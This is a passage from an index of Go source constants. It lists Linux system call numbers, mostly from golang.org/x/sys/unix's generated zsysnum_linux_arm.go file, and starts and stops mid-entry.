434 constant SYS_CLONE3 (line 355) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 356) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 357) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 358) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 359) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 360) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 361) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 362) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 363) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 364) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 365) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 366) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_MEMFD_SECRET (line 367) | SYS_MEMFD_SECRET = 447 constant SYS_PROCESS_MRELEASE (line 368) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 369) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 370) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 371) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 372) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 373) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 374) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 375) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 376) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_arm.go constant SYS_SYSCALL_MASK (line 9) | SYS_SYSCALL_MASK = 0 constant SYS_RESTART_SYSCALL (line 10) | SYS_RESTART_SYSCALL = 0 constant SYS_EXIT (line 11) | SYS_EXIT = 1 constant SYS_FORK (line 12) | SYS_FORK = 2 constant SYS_READ (line 13) | SYS_READ = 3 constant SYS_WRITE (line 14) | SYS_WRITE = 4 constant SYS_OPEN (line 15) | SYS_OPEN = 5 constant SYS_CLOSE (line 16) | SYS_CLOSE = 6 constant SYS_CREAT (line 17) | SYS_CREAT = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_EXECVE (line 20) | SYS_EXECVE = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_MKNOD (line 22) | SYS_MKNOD = 14 constant SYS_CHMOD (line 23) | SYS_CHMOD = 15 constant SYS_LCHOWN (line 24) | SYS_LCHOWN = 16 constant SYS_LSEEK (line 25) | SYS_LSEEK = 19 constant SYS_GETPID (line 26) | SYS_GETPID = 20 constant SYS_MOUNT (line 27) | SYS_MOUNT = 21 constant SYS_SETUID (line 28) | SYS_SETUID = 23 constant SYS_GETUID (line 29) | SYS_GETUID = 24 constant SYS_PTRACE (line 30) | SYS_PTRACE = 26 constant SYS_PAUSE (line 31) | SYS_PAUSE = 29 constant SYS_ACCESS (line 32) | SYS_ACCESS = 33 constant SYS_NICE (line 33) | SYS_NICE = 34 constant SYS_SYNC (line 34) | SYS_SYNC = 36 constant SYS_KILL (line 35) | SYS_KILL = 37 constant SYS_RENAME (line 36) | SYS_RENAME = 38 constant SYS_MKDIR (line 37) | SYS_MKDIR = 39 constant SYS_RMDIR (line 38) | SYS_RMDIR = 40 constant SYS_DUP (line 39) | SYS_DUP = 41 constant SYS_PIPE (line 40) | SYS_PIPE = 42 constant SYS_TIMES (line 41) | SYS_TIMES = 43 constant SYS_BRK (line 42) | SYS_BRK = 45 constant SYS_SETGID (line 43) | SYS_SETGID = 46 constant SYS_GETGID (line 44) | SYS_GETGID = 47 constant SYS_GETEUID (line 45) | SYS_GETEUID = 49 constant SYS_GETEGID (line 46) | SYS_GETEGID = 50 constant SYS_ACCT (line 47) | SYS_ACCT = 51 constant SYS_UMOUNT2 (line 48) | SYS_UMOUNT2 = 52 constant SYS_IOCTL (line 49) | SYS_IOCTL = 54 constant SYS_FCNTL (line 50) | SYS_FCNTL = 55 constant SYS_SETPGID (line 51) | SYS_SETPGID = 57 constant SYS_UMASK (line 52) | SYS_UMASK = 60 constant SYS_CHROOT (line 53) | SYS_CHROOT = 61 constant SYS_USTAT (line 54) | SYS_USTAT = 62 constant SYS_DUP2 (line 55) | SYS_DUP2 = 63 constant SYS_GETPPID (line 56) | SYS_GETPPID = 64 constant SYS_GETPGRP (line 57) | SYS_GETPGRP = 65 constant SYS_SETSID (line 58) | SYS_SETSID = 66 constant SYS_SIGACTION (line 59) | SYS_SIGACTION = 67 constant SYS_SETREUID (line 60) | SYS_SETREUID = 70 constant SYS_SETREGID (line 61) | SYS_SETREGID = 71 constant SYS_SIGSUSPEND (line 62) | SYS_SIGSUSPEND = 72 constant SYS_SIGPENDING (line 63) | SYS_SIGPENDING = 73 constant SYS_SETHOSTNAME (line 64) | SYS_SETHOSTNAME = 74 constant SYS_SETRLIMIT (line 65) | SYS_SETRLIMIT = 75 constant SYS_GETRUSAGE (line 66) | SYS_GETRUSAGE = 77 constant SYS_GETTIMEOFDAY (line 67) | SYS_GETTIMEOFDAY = 78 constant SYS_SETTIMEOFDAY (line 68) | SYS_SETTIMEOFDAY = 79 constant SYS_GETGROUPS (line 69) | SYS_GETGROUPS = 80 constant SYS_SETGROUPS (line 70) | SYS_SETGROUPS = 81 constant SYS_SYMLINK (line 71) | SYS_SYMLINK = 83 constant SYS_READLINK (line 72) | SYS_READLINK = 85 constant SYS_USELIB (line 73) | SYS_USELIB = 86 constant SYS_SWAPON (line 74) | SYS_SWAPON = 87 constant SYS_REBOOT (line 75) | SYS_REBOOT = 88 constant SYS_MUNMAP (line 76) | SYS_MUNMAP = 91 constant SYS_TRUNCATE (line 77) | SYS_TRUNCATE = 92 constant SYS_FTRUNCATE (line 78) | SYS_FTRUNCATE = 93 constant SYS_FCHMOD (line 79) | SYS_FCHMOD = 94 constant SYS_FCHOWN (line 80) | SYS_FCHOWN = 95 constant SYS_GETPRIORITY (line 81) | SYS_GETPRIORITY = 96 constant SYS_SETPRIORITY (line 82) | SYS_SETPRIORITY = 97 constant SYS_STATFS (line 83) | SYS_STATFS = 99 constant SYS_FSTATFS (line 84) | SYS_FSTATFS = 100 constant SYS_SYSLOG (line 85) | SYS_SYSLOG = 103 constant SYS_SETITIMER (line 86) | SYS_SETITIMER = 104 constant SYS_GETITIMER (line 87) | SYS_GETITIMER = 105 constant SYS_STAT (line 88) | SYS_STAT = 106 constant SYS_LSTAT (line 89) | SYS_LSTAT = 107 constant SYS_FSTAT (line 90) | SYS_FSTAT = 108 constant SYS_VHANGUP (line 91) | SYS_VHANGUP = 111 constant SYS_WAIT4 (line 92) | SYS_WAIT4 = 114 constant SYS_SWAPOFF (line 93) | SYS_SWAPOFF = 115 constant SYS_SYSINFO (line 94) | SYS_SYSINFO = 116 constant SYS_FSYNC (line 95) | SYS_FSYNC = 118 constant SYS_SIGRETURN (line 96) | SYS_SIGRETURN = 119 constant SYS_CLONE (line 97) | SYS_CLONE = 120 constant SYS_SETDOMAINNAME (line 98) | SYS_SETDOMAINNAME = 121 constant SYS_UNAME (line 99) | SYS_UNAME = 122 constant SYS_ADJTIMEX (line 100) | SYS_ADJTIMEX = 124 constant SYS_MPROTECT (line 101) | SYS_MPROTECT = 125 constant SYS_SIGPROCMASK (line 102) | SYS_SIGPROCMASK = 126 constant SYS_INIT_MODULE (line 103) | SYS_INIT_MODULE = 128 constant SYS_DELETE_MODULE (line 104) | SYS_DELETE_MODULE = 129 constant SYS_QUOTACTL (line 105) | SYS_QUOTACTL = 131 constant SYS_GETPGID (line 106) | SYS_GETPGID = 132 constant SYS_FCHDIR (line 107) | SYS_FCHDIR = 133 constant SYS_BDFLUSH (line 108) | SYS_BDFLUSH = 134 constant SYS_SYSFS (line 109) | SYS_SYSFS = 135 constant SYS_PERSONALITY (line 110) | SYS_PERSONALITY = 136 constant SYS_SETFSUID (line 111) | SYS_SETFSUID = 138 constant SYS_SETFSGID (line 112) | SYS_SETFSGID = 139 constant SYS__LLSEEK (line 113) | SYS__LLSEEK = 140 constant SYS_GETDENTS (line 114) | SYS_GETDENTS = 141 constant SYS__NEWSELECT (line 115) | SYS__NEWSELECT = 142 constant SYS_FLOCK (line 116) | SYS_FLOCK = 143 constant SYS_MSYNC (line 117) | SYS_MSYNC = 144 constant SYS_READV (line 118) | SYS_READV = 145 constant SYS_WRITEV (line 119) | SYS_WRITEV = 146 constant SYS_GETSID (line 120) | SYS_GETSID = 147 constant SYS_FDATASYNC (line 121) | SYS_FDATASYNC = 148 constant SYS__SYSCTL (line 122) | SYS__SYSCTL = 149 constant SYS_MLOCK (line 123) | SYS_MLOCK = 150 constant SYS_MUNLOCK (line 124) | SYS_MUNLOCK = 151 constant SYS_MLOCKALL (line 125) | SYS_MLOCKALL = 152 constant SYS_MUNLOCKALL (line 126) | SYS_MUNLOCKALL = 153 constant SYS_SCHED_SETPARAM (line 127) | SYS_SCHED_SETPARAM = 154 constant SYS_SCHED_GETPARAM (line 128) | SYS_SCHED_GETPARAM = 155 constant SYS_SCHED_SETSCHEDULER (line 129) | SYS_SCHED_SETSCHEDULER = 156 constant SYS_SCHED_GETSCHEDULER (line 130) | SYS_SCHED_GETSCHEDULER = 157 constant SYS_SCHED_YIELD (line 131) | SYS_SCHED_YIELD = 158 constant SYS_SCHED_GET_PRIORITY_MAX (line 132) | SYS_SCHED_GET_PRIORITY_MAX = 159 constant SYS_SCHED_GET_PRIORITY_MIN (line 133) | SYS_SCHED_GET_PRIORITY_MIN = 160 constant SYS_SCHED_RR_GET_INTERVAL (line 134) | SYS_SCHED_RR_GET_INTERVAL = 161 constant SYS_NANOSLEEP (line 135) | SYS_NANOSLEEP = 162 constant SYS_MREMAP (line 136) | SYS_MREMAP = 163 constant SYS_SETRESUID (line 137) | SYS_SETRESUID = 164 constant SYS_GETRESUID (line 138) | SYS_GETRESUID = 165 constant SYS_POLL (line 139) | SYS_POLL = 168 constant SYS_NFSSERVCTL (line 140) | SYS_NFSSERVCTL = 169 constant SYS_SETRESGID (line 141) | SYS_SETRESGID = 170 constant SYS_GETRESGID (line 142) | SYS_GETRESGID = 171 constant SYS_PRCTL (line 143) | SYS_PRCTL = 172 constant SYS_RT_SIGRETURN (line 144) | SYS_RT_SIGRETURN = 173 constant SYS_RT_SIGACTION (line 145) | SYS_RT_SIGACTION = 174 constant SYS_RT_SIGPROCMASK (line 146) | SYS_RT_SIGPROCMASK = 175 constant SYS_RT_SIGPENDING (line 147) | SYS_RT_SIGPENDING = 176 constant SYS_RT_SIGTIMEDWAIT (line 148) | SYS_RT_SIGTIMEDWAIT = 177 constant SYS_RT_SIGQUEUEINFO (line 149) | SYS_RT_SIGQUEUEINFO = 178 constant SYS_RT_SIGSUSPEND (line 150) | SYS_RT_SIGSUSPEND = 179 constant SYS_PREAD64 (line 151) | SYS_PREAD64 = 180 constant SYS_PWRITE64 (line 152) | SYS_PWRITE64 = 181 constant SYS_CHOWN (line 153) | SYS_CHOWN = 182 constant SYS_GETCWD (line 154) | SYS_GETCWD = 183 constant SYS_CAPGET (line 155) | SYS_CAPGET = 184 constant SYS_CAPSET (line 156) | SYS_CAPSET = 185 constant SYS_SIGALTSTACK (line 157) | SYS_SIGALTSTACK = 186 constant SYS_SENDFILE (line 158) | SYS_SENDFILE = 187 constant SYS_VFORK (line 159) | SYS_VFORK = 190 constant SYS_UGETRLIMIT (line 160) | SYS_UGETRLIMIT = 191 constant SYS_MMAP2 (line 161) | SYS_MMAP2 = 192 constant SYS_TRUNCATE64 (line 162) | SYS_TRUNCATE64 = 193 constant SYS_FTRUNCATE64 (line 163) | SYS_FTRUNCATE64 = 194 constant SYS_STAT64 (line 164) | SYS_STAT64 = 195 constant SYS_LSTAT64 (line 165) | SYS_LSTAT64 = 196 constant SYS_FSTAT64 (line 166) | SYS_FSTAT64 = 197 constant SYS_LCHOWN32 (line 167) | SYS_LCHOWN32 = 198 constant SYS_GETUID32 (line 168) | SYS_GETUID32 = 199 constant SYS_GETGID32 (line 169) | SYS_GETGID32 = 200 constant SYS_GETEUID32 (line 170) | SYS_GETEUID32 = 201 constant SYS_GETEGID32 (line 171) | SYS_GETEGID32 = 202 constant SYS_SETREUID32 (line 172) | SYS_SETREUID32 = 203 constant SYS_SETREGID32 (line 173) | SYS_SETREGID32 = 204 constant SYS_GETGROUPS32 (line 174) | SYS_GETGROUPS32 = 205 constant SYS_SETGROUPS32 (line 175) | SYS_SETGROUPS32 = 206 constant SYS_FCHOWN32 (line 176) | SYS_FCHOWN32 = 207 constant SYS_SETRESUID32 (line 177) | SYS_SETRESUID32 = 208 constant SYS_GETRESUID32 (line 178) | SYS_GETRESUID32 = 209 constant SYS_SETRESGID32 (line 179) | SYS_SETRESGID32 = 210 constant SYS_GETRESGID32 (line 180) | SYS_GETRESGID32 = 211 constant SYS_CHOWN32 (line 181) | SYS_CHOWN32 = 212 constant SYS_SETUID32 (line 182) | SYS_SETUID32 = 213 constant SYS_SETGID32 (line 183) | SYS_SETGID32 = 214 constant SYS_SETFSUID32 (line 184) | SYS_SETFSUID32 = 215 constant SYS_SETFSGID32 (line 185) | SYS_SETFSGID32 = 216 constant SYS_GETDENTS64 (line 186) | SYS_GETDENTS64 = 217 constant SYS_PIVOT_ROOT (line 187) | SYS_PIVOT_ROOT = 218 constant SYS_MINCORE (line 188) | SYS_MINCORE = 219 constant SYS_MADVISE (line 189) | SYS_MADVISE = 220 constant SYS_FCNTL64 (line 190) | SYS_FCNTL64 = 221 constant SYS_GETTID (line 191) | SYS_GETTID = 224 constant SYS_READAHEAD (line 192) | SYS_READAHEAD = 225 constant SYS_SETXATTR (line 193) | SYS_SETXATTR = 226 constant SYS_LSETXATTR (line 194) | SYS_LSETXATTR = 227 constant SYS_FSETXATTR (line 195) | SYS_FSETXATTR = 228 constant SYS_GETXATTR (line 196) | SYS_GETXATTR = 229 constant SYS_LGETXATTR (line 197) | SYS_LGETXATTR = 230 constant SYS_FGETXATTR (line 198) | SYS_FGETXATTR = 231 constant SYS_LISTXATTR (line 199) | SYS_LISTXATTR = 232 constant SYS_LLISTXATTR (line 200) | SYS_LLISTXATTR = 233 constant SYS_FLISTXATTR (line 201) | SYS_FLISTXATTR = 234 constant SYS_REMOVEXATTR (line 202) | SYS_REMOVEXATTR = 235 constant SYS_LREMOVEXATTR (line 203) | SYS_LREMOVEXATTR = 236 constant SYS_FREMOVEXATTR (line 204) | SYS_FREMOVEXATTR = 237 constant SYS_TKILL (line 205) | SYS_TKILL = 238 constant SYS_SENDFILE64 (line 206) | SYS_SENDFILE64 = 239 constant SYS_FUTEX (line 207) | SYS_FUTEX = 240 constant SYS_SCHED_SETAFFINITY (line 208) | SYS_SCHED_SETAFFINITY = 241 constant SYS_SCHED_GETAFFINITY (line 209) | SYS_SCHED_GETAFFINITY = 242 constant SYS_IO_SETUP (line 210) | SYS_IO_SETUP = 243 constant SYS_IO_DESTROY (line 211) | SYS_IO_DESTROY = 244 constant SYS_IO_GETEVENTS (line 212) | SYS_IO_GETEVENTS = 245 constant SYS_IO_SUBMIT (line 213) | SYS_IO_SUBMIT = 246 constant SYS_IO_CANCEL (line 214) | SYS_IO_CANCEL = 247 constant SYS_EXIT_GROUP (line 215) | SYS_EXIT_GROUP = 248 constant SYS_LOOKUP_DCOOKIE (line 216) | SYS_LOOKUP_DCOOKIE = 249 constant SYS_EPOLL_CREATE (line 217) | SYS_EPOLL_CREATE = 250 constant SYS_EPOLL_CTL (line 218) | SYS_EPOLL_CTL = 251 constant SYS_EPOLL_WAIT (line 219) | SYS_EPOLL_WAIT = 252 constant SYS_REMAP_FILE_PAGES (line 220) | SYS_REMAP_FILE_PAGES = 253 constant SYS_SET_TID_ADDRESS (line 221) | SYS_SET_TID_ADDRESS = 256 constant SYS_TIMER_CREATE (line 222) | SYS_TIMER_CREATE = 257 constant SYS_TIMER_SETTIME (line 223) | SYS_TIMER_SETTIME = 258 constant SYS_TIMER_GETTIME (line 224) | SYS_TIMER_GETTIME = 259 constant SYS_TIMER_GETOVERRUN (line 225) | SYS_TIMER_GETOVERRUN = 260 constant SYS_TIMER_DELETE (line 226) | SYS_TIMER_DELETE = 261 constant SYS_CLOCK_SETTIME (line 227) | SYS_CLOCK_SETTIME = 262 constant SYS_CLOCK_GETTIME (line 228) | SYS_CLOCK_GETTIME = 263 constant SYS_CLOCK_GETRES (line 229) | SYS_CLOCK_GETRES = 264 constant SYS_CLOCK_NANOSLEEP (line 230) | SYS_CLOCK_NANOSLEEP = 265 constant SYS_STATFS64 (line 231) | SYS_STATFS64 = 266 constant SYS_FSTATFS64 (line 232) | SYS_FSTATFS64 = 267 constant SYS_TGKILL (line 233) | SYS_TGKILL = 268 constant SYS_UTIMES (line 234) | SYS_UTIMES = 269 constant SYS_ARM_FADVISE64_64 (line 235) | SYS_ARM_FADVISE64_64 = 270 constant SYS_PCICONFIG_IOBASE (line 236) | SYS_PCICONFIG_IOBASE = 271 constant SYS_PCICONFIG_READ (line 237) | SYS_PCICONFIG_READ = 272 constant SYS_PCICONFIG_WRITE (line 238) | SYS_PCICONFIG_WRITE = 273 constant SYS_MQ_OPEN (line 239) | SYS_MQ_OPEN = 274 constant SYS_MQ_UNLINK (line 240) | SYS_MQ_UNLINK = 275 constant SYS_MQ_TIMEDSEND (line 241) | SYS_MQ_TIMEDSEND = 276 constant SYS_MQ_TIMEDRECEIVE (line 242) | SYS_MQ_TIMEDRECEIVE = 277 constant SYS_MQ_NOTIFY (line 243) | SYS_MQ_NOTIFY = 278 constant SYS_MQ_GETSETATTR (line 244) | SYS_MQ_GETSETATTR = 279 constant SYS_WAITID (line 245) | SYS_WAITID = 280 constant SYS_SOCKET (line 246) | SYS_SOCKET = 281 constant SYS_BIND (line 247) | SYS_BIND = 282 constant SYS_CONNECT (line 248) | SYS_CONNECT = 283 constant SYS_LISTEN (line 249) | SYS_LISTEN = 284 constant SYS_ACCEPT (line 250) | SYS_ACCEPT = 285 constant SYS_GETSOCKNAME (line 251) | SYS_GETSOCKNAME = 286 constant SYS_GETPEERNAME (line 252) | SYS_GETPEERNAME = 287 constant SYS_SOCKETPAIR (line 253) | SYS_SOCKETPAIR = 288 constant SYS_SEND (line 254) | SYS_SEND = 289 constant SYS_SENDTO (line 255) | SYS_SENDTO = 290 constant SYS_RECV (line 256) | SYS_RECV = 291 constant SYS_RECVFROM (line 257) | SYS_RECVFROM = 292 constant SYS_SHUTDOWN (line 258) | SYS_SHUTDOWN = 293 constant SYS_SETSOCKOPT (line 259) | SYS_SETSOCKOPT = 294 constant SYS_GETSOCKOPT (line 260) | SYS_GETSOCKOPT = 295 constant SYS_SENDMSG (line 261) | SYS_SENDMSG = 296 constant SYS_RECVMSG (line 262) | SYS_RECVMSG = 297 constant SYS_SEMOP (line 263) | SYS_SEMOP = 298 constant SYS_SEMGET (line 264) | SYS_SEMGET = 299 constant SYS_SEMCTL (line 265) | SYS_SEMCTL = 300 constant SYS_MSGSND (line 266) | SYS_MSGSND = 301 constant SYS_MSGRCV (line 267) | SYS_MSGRCV = 302 constant SYS_MSGGET (line 268) | SYS_MSGGET = 303 constant SYS_MSGCTL (line 269) | SYS_MSGCTL = 304 constant SYS_SHMAT (line 270) | SYS_SHMAT = 305 constant SYS_SHMDT (line 271) | SYS_SHMDT = 306 constant SYS_SHMGET (line 272) | SYS_SHMGET = 307 constant SYS_SHMCTL (line 273) | SYS_SHMCTL = 308 constant SYS_ADD_KEY (line 274) | SYS_ADD_KEY = 309 constant SYS_REQUEST_KEY (line 275) | SYS_REQUEST_KEY = 310 constant SYS_KEYCTL (line 276) | SYS_KEYCTL = 311 constant SYS_SEMTIMEDOP (line 277) | SYS_SEMTIMEDOP = 312 constant SYS_VSERVER (line 278) | SYS_VSERVER = 313 constant SYS_IOPRIO_SET (line 279) | SYS_IOPRIO_SET = 314 constant SYS_IOPRIO_GET (line 280) | SYS_IOPRIO_GET = 315 constant SYS_INOTIFY_INIT (line 281) | SYS_INOTIFY_INIT = 316 constant SYS_INOTIFY_ADD_WATCH (line 282) | SYS_INOTIFY_ADD_WATCH = 317 constant SYS_INOTIFY_RM_WATCH (line 283) | SYS_INOTIFY_RM_WATCH = 318 constant SYS_MBIND (line 284) | SYS_MBIND = 319 constant SYS_GET_MEMPOLICY (line 285) | SYS_GET_MEMPOLICY = 320 constant SYS_SET_MEMPOLICY (line 286) | SYS_SET_MEMPOLICY = 321 constant SYS_OPENAT (line 287) | SYS_OPENAT = 322 constant SYS_MKDIRAT (line 288) | SYS_MKDIRAT = 323 constant SYS_MKNODAT (line 289) | SYS_MKNODAT = 324 constant SYS_FCHOWNAT (line 290) | SYS_FCHOWNAT = 325 constant SYS_FUTIMESAT (line 291) | SYS_FUTIMESAT = 326 constant SYS_FSTATAT64 (line 292) | SYS_FSTATAT64 = 327 constant SYS_UNLINKAT (line 293) | SYS_UNLINKAT = 328 constant SYS_RENAMEAT (line 294) | SYS_RENAMEAT = 329 constant SYS_LINKAT (line 295) | SYS_LINKAT = 330 constant SYS_SYMLINKAT (line 296) | SYS_SYMLINKAT = 331 constant SYS_READLINKAT (line 297) | SYS_READLINKAT = 332 constant SYS_FCHMODAT (line 298) | SYS_FCHMODAT = 333 constant SYS_FACCESSAT (line 299) | SYS_FACCESSAT = 334 constant SYS_PSELECT6 (line 300) | SYS_PSELECT6 = 335 constant SYS_PPOLL (line 301) | SYS_PPOLL = 336 constant SYS_UNSHARE (line 302) | SYS_UNSHARE = 337 constant SYS_SET_ROBUST_LIST (line 303) | SYS_SET_ROBUST_LIST = 338 constant SYS_GET_ROBUST_LIST (line 304) | SYS_GET_ROBUST_LIST = 339 constant SYS_SPLICE (line 305) | SYS_SPLICE = 340 constant SYS_ARM_SYNC_FILE_RANGE (line 306) | SYS_ARM_SYNC_FILE_RANGE = 341 constant SYS_TEE (line 307) | SYS_TEE = 342 constant SYS_VMSPLICE (line 308) | SYS_VMSPLICE = 343 constant SYS_MOVE_PAGES (line 309) | SYS_MOVE_PAGES = 344 constant SYS_GETCPU (line 310) | SYS_GETCPU = 345 constant SYS_EPOLL_PWAIT (line 311) | SYS_EPOLL_PWAIT = 346 constant SYS_KEXEC_LOAD (line 312) | SYS_KEXEC_LOAD = 347 constant SYS_UTIMENSAT (line 313) | SYS_UTIMENSAT = 348 constant SYS_SIGNALFD (line 314) | SYS_SIGNALFD = 349 constant SYS_TIMERFD_CREATE (line 315) | SYS_TIMERFD_CREATE = 350 constant SYS_EVENTFD (line 316) | SYS_EVENTFD = 351 constant SYS_FALLOCATE (line 317) | SYS_FALLOCATE = 352 constant SYS_TIMERFD_SETTIME (line 318) | SYS_TIMERFD_SETTIME = 353 constant SYS_TIMERFD_GETTIME (line 319) | SYS_TIMERFD_GETTIME = 354 constant SYS_SIGNALFD4 (line 320) | SYS_SIGNALFD4 = 355 constant SYS_EVENTFD2 (line 321) | SYS_EVENTFD2 = 356 constant SYS_EPOLL_CREATE1 (line 322) | SYS_EPOLL_CREATE1 = 357 constant SYS_DUP3 (line 323) | SYS_DUP3 = 358 constant SYS_PIPE2 (line 324) | SYS_PIPE2 = 359 constant SYS_INOTIFY_INIT1 (line 325) | SYS_INOTIFY_INIT1 = 360 constant SYS_PREADV (line 326) | SYS_PREADV = 361 constant SYS_PWRITEV (line 327) | SYS_PWRITEV = 362 constant SYS_RT_TGSIGQUEUEINFO (line 328) | SYS_RT_TGSIGQUEUEINFO = 363 constant SYS_PERF_EVENT_OPEN (line 329) | SYS_PERF_EVENT_OPEN = 364 constant SYS_RECVMMSG (line 330) | SYS_RECVMMSG = 365 constant SYS_ACCEPT4 (line 331) | SYS_ACCEPT4 = 366 constant SYS_FANOTIFY_INIT (line 332) | SYS_FANOTIFY_INIT = 367 constant SYS_FANOTIFY_MARK (line 333) | SYS_FANOTIFY_MARK = 368 constant SYS_PRLIMIT64 (line 334) | SYS_PRLIMIT64 = 369 constant SYS_NAME_TO_HANDLE_AT (line 335) | SYS_NAME_TO_HANDLE_AT = 370 constant SYS_OPEN_BY_HANDLE_AT (line 336) | SYS_OPEN_BY_HANDLE_AT = 371 constant SYS_CLOCK_ADJTIME (line 337) | SYS_CLOCK_ADJTIME = 372 constant SYS_SYNCFS (line 338) | SYS_SYNCFS = 373 constant SYS_SENDMMSG (line 339) | SYS_SENDMMSG = 374 constant SYS_SETNS (line 340) | SYS_SETNS = 375 constant SYS_PROCESS_VM_READV (line 341) | SYS_PROCESS_VM_READV = 376 constant SYS_PROCESS_VM_WRITEV (line 342) | SYS_PROCESS_VM_WRITEV = 377 constant SYS_KCMP (line 343) | SYS_KCMP = 378 constant SYS_FINIT_MODULE (line 344) | SYS_FINIT_MODULE = 379 constant SYS_SCHED_SETATTR (line 345) | SYS_SCHED_SETATTR = 380 constant SYS_SCHED_GETATTR (line 346) | SYS_SCHED_GETATTR = 381 constant SYS_RENAMEAT2 (line 347) | SYS_RENAMEAT2 = 382 constant SYS_SECCOMP (line 348) | SYS_SECCOMP = 383 constant SYS_GETRANDOM (line 349) | SYS_GETRANDOM = 384 constant SYS_MEMFD_CREATE (line 350) | SYS_MEMFD_CREATE = 385 constant SYS_BPF (line 351) | SYS_BPF = 386 constant SYS_EXECVEAT (line 352) | SYS_EXECVEAT = 387 constant SYS_USERFAULTFD (line 353) | SYS_USERFAULTFD = 388 constant SYS_MEMBARRIER (line 354) | SYS_MEMBARRIER = 389 constant SYS_MLOCK2 (line 355) | SYS_MLOCK2 = 390 constant SYS_COPY_FILE_RANGE (line 356) | SYS_COPY_FILE_RANGE = 391 constant SYS_PREADV2 (line 357) | SYS_PREADV2 = 392 constant SYS_PWRITEV2 (line 358) | SYS_PWRITEV2 = 393 constant SYS_PKEY_MPROTECT (line 359) | SYS_PKEY_MPROTECT = 394 constant SYS_PKEY_ALLOC (line 360) | SYS_PKEY_ALLOC = 395 constant SYS_PKEY_FREE (line 361) | SYS_PKEY_FREE = 396 constant SYS_STATX (line 362) | SYS_STATX = 397 constant SYS_RSEQ (line 363) | SYS_RSEQ = 398 constant SYS_IO_PGETEVENTS (line 364) | SYS_IO_PGETEVENTS = 399 constant SYS_MIGRATE_PAGES (line 365) | SYS_MIGRATE_PAGES = 400 constant SYS_KEXEC_FILE_LOAD (line 366) | SYS_KEXEC_FILE_LOAD = 401 constant SYS_CLOCK_GETTIME64 (line 367) | SYS_CLOCK_GETTIME64 = 403 constant SYS_CLOCK_SETTIME64 (line 368) | SYS_CLOCK_SETTIME64 = 404 constant SYS_CLOCK_ADJTIME64 (line 369) | SYS_CLOCK_ADJTIME64 = 405 constant SYS_CLOCK_GETRES_TIME64 (line 370) | SYS_CLOCK_GETRES_TIME64 = 406 constant SYS_CLOCK_NANOSLEEP_TIME64 (line 371) | SYS_CLOCK_NANOSLEEP_TIME64 = 407 constant SYS_TIMER_GETTIME64 (line 372) | SYS_TIMER_GETTIME64 = 408 constant SYS_TIMER_SETTIME64 (line 373) | SYS_TIMER_SETTIME64 = 409 constant SYS_TIMERFD_GETTIME64 (line 374) | SYS_TIMERFD_GETTIME64 = 410 constant SYS_TIMERFD_SETTIME64 (line 375) | SYS_TIMERFD_SETTIME64 = 411 constant SYS_UTIMENSAT_TIME64 (line 376) | SYS_UTIMENSAT_TIME64 = 412 constant SYS_PSELECT6_TIME64 (line 377) | SYS_PSELECT6_TIME64 = 413 constant SYS_PPOLL_TIME64 (line 378) | SYS_PPOLL_TIME64 = 414 constant SYS_IO_PGETEVENTS_TIME64 (line 379) | SYS_IO_PGETEVENTS_TIME64 = 416 constant SYS_RECVMMSG_TIME64 (line 380) | SYS_RECVMMSG_TIME64 = 417 constant SYS_MQ_TIMEDSEND_TIME64 (line 381) | SYS_MQ_TIMEDSEND_TIME64 = 418 constant SYS_MQ_TIMEDRECEIVE_TIME64 (line 382) | SYS_MQ_TIMEDRECEIVE_TIME64 = 419 constant SYS_SEMTIMEDOP_TIME64 (line 383) | SYS_SEMTIMEDOP_TIME64 = 420 constant SYS_RT_SIGTIMEDWAIT_TIME64 (line 384) | SYS_RT_SIGTIMEDWAIT_TIME64 = 421 constant SYS_FUTEX_TIME64 (line 385) | SYS_FUTEX_TIME64 = 422 constant SYS_SCHED_RR_GET_INTERVAL_TIME64 (line 386) | SYS_SCHED_RR_GET_INTERVAL_TIME64 = 423 constant SYS_PIDFD_SEND_SIGNAL (line 387) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 388) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 389) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 390) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 391) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 392) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 393) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 394) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 395) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 396) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 397) | SYS_PIDFD_OPEN = 434 constant SYS_CLONE3 (line 398) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 399) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 400) | SYS_OPENAT2 = 437 constant 